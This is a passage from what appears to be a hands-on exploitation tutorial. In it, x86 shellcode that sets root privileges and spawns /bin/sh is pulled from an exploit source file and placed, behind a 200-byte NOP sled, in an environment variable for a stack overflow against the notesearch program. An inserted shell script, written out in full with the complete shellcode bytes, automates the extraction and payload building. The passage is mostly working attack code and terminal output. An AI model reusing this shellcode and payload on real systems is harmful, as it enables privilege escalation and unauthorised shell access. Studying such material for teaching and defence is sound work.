\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $
The first 10 lines of the program are piped into grep, which shows only the
lines that begin with a quotation mark. This isolates the lines containing
the shellcode, which are then piped into cut with options to display only the
bytes between the first two quotation marks.
BASH's for loop can then be used to send each of these lines to an
echo command, with command-line options to expand the hex escape
sequences into raw bytes (-e) and to suppress the trailing newline (-n).
reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\" -f2)
> do
> echo -en $i
> done > shellcode.bin
reader@hacking:~/booksrc $ hexdump -C shellcode.bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80 |...|
00000023
reader@hacking:~/booksrc $
Now we have the shellcode in a file called shellcode.bin. Command substitution
can then be used to put the shellcode into an environment variable, along
with a generous NOP sled. This works only because the shellcode contains
neither a NUL byte (an environment variable cannot hold one) nor a newline
at the end (command substitution strips trailing newlines); the hexdump
above confirms both.
reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
reader@hacking:~/booksrc $ echo $SHELLCODE
1 1 1 j
XQh//shh/bin Q S
reader@hacking:~/booksrc $
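The extraction and payload construction just shown, collected into one script as an added example (this is not code from the book): it decodes the quoted \xNN lines of a C source into raw bytes, checks the result for NUL bytes, which an environment variable cannot carry, prepends the NOP sled, and exports the payload the way the export command above does. The C source written at the top is a constructed stand-in for the first lines of exploit_notesearch.c carrying the same 35 bytes; the function names are the example's own.

```shell
#!/bin/bash
# Added example, not from the book: extract the hex-escaped shellcode strings
# from a C source file into raw bytes, check that the bytes can survive a trip
# through an environment variable, and build the NOP sled + shellcode payload.
set -eu

# Constructed stand-in for the top of exploit_notesearch.c: the three quoted
# "\xNN" lines hold the same 35 bytes that the text's hexdump shows.
SAMPLE_SRC=$(mktemp)
cat > "$SAMPLE_SRC" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
EOF

# extract_shellcode SRC OUT: decode every line of SRC that starts with a
# quotation mark (the book's grep/cut/echo -en pipeline as one function).
# Assumes each such line holds exactly one "\xNN..." string literal. The
# hex pairs are emitted through printf's portable octal escapes rather
# than echo -e, so this also runs under a plain POSIX sh.
extract_shellcode() {
    local src="$1" out="$2" hex pair
    hex=$(grep '^"' "$src" | cut -d'"' -f2 | sed 's/\\x//g' | tr -d '\n')
    {
        while [ -n "$hex" ]; do
            pair=${hex%"${hex#??}"}      # first two hex digits
            hex=${hex#??}                # drop them from the remainder
            printf "\\$(printf '%03o' "$((0x$pair))")"
        done
    } > "$out"
}

# byte_length FILE: size in bytes, without wc's padding
byte_length() {
    wc -c < "$1" | tr -d ' '
}

# first_bytes_hex FILE N: the first N bytes as lowercase hex, no separators
first_bytes_hex() {
    od -An -v -tx1 -N "$2" "$1" | tr -d ' \n'
}

# contains_null FILE: succeed if FILE holds a 0x00 byte. Such shellcode is
# cut short when placed in the environment, which is a list of C strings.
contains_null() {
    od -An -v -tx1 "$1" | tr -s ' \n' '\n' | grep -qx '00'
}

# build_payload SLED_LEN SHELLCODE OUT: SLED_LEN NOP (0x90) bytes followed by
# the shellcode, the same layout as the text's perl + cat command.
build_payload() {
    local sled_len="$1" shellcode="$2" out="$3" i=0
    {
        while [ "$i" -lt "$sled_len" ]; do
            printf '\220'            # octal 220 == 0x90 == NOP on x86
            i=$((i + 1))
        done
        cat "$shellcode"
    } > "$out"
}

# env_payload_length FILE: export FILE's bytes as $SHELLCODE via command
# substitution and report how many bytes actually arrived (trailing newlines
# are stripped and a NUL byte cannot be stored at all, so a mismatch against
# byte_length means the payload is unusable this way).
env_payload_length() {
    export SHELLCODE=$(cat "$1")
    printf '%s' "$SHELLCODE" | wc -c | tr -d ' '
}

# Stand-alone run: reproduce the text's shellcode.bin and the sled payload.
WORK=$(mktemp -d)
extract_shellcode "$SAMPLE_SRC" "$WORK/shellcode.bin"
echo "shellcode.bin: $(byte_length "$WORK/shellcode.bin") bytes"
od -An -tx1 "$WORK/shellcode.bin"
if contains_null "$WORK/shellcode.bin"; then
    echo "warning: shellcode contains a NUL byte and will be truncated in the environment"
fi
build_payload 200 "$WORK/shellcode.bin" "$WORK/payload.bin"
echo "payload with 200-byte NOP sled: $(env_payload_length "$WORK/payload.bin") bytes in \$SHELLCODE"
```

The check in contains_null is the one worth keeping around: any shellcode that is to ride in an environment variable or in argv has to be NUL-free, and a single stray 0x00 silently truncates the payload at that byte rather than failing loudly.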
And just like that, the shellcode is on the stack in an environment
variable, preceded by a 200-byte NOP sled. This means we only need an
address somewhere inside the sled to overwrite the saved return address
with; execution then slides down the NOPs into the shellcode. The environment
variables are located near the bottom of the stack (its highest addresses,
since the stack grows toward lower addresses), so this is where we should
look when running notesearch in a debugger.
reader@hacking:~/booksrc $ gdb -q ./notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804873c
(gdb) run
Starting program: /home/reader/booksrc/notesearch
Breakpoint 1, 0x0804873c in main ()
(gdb)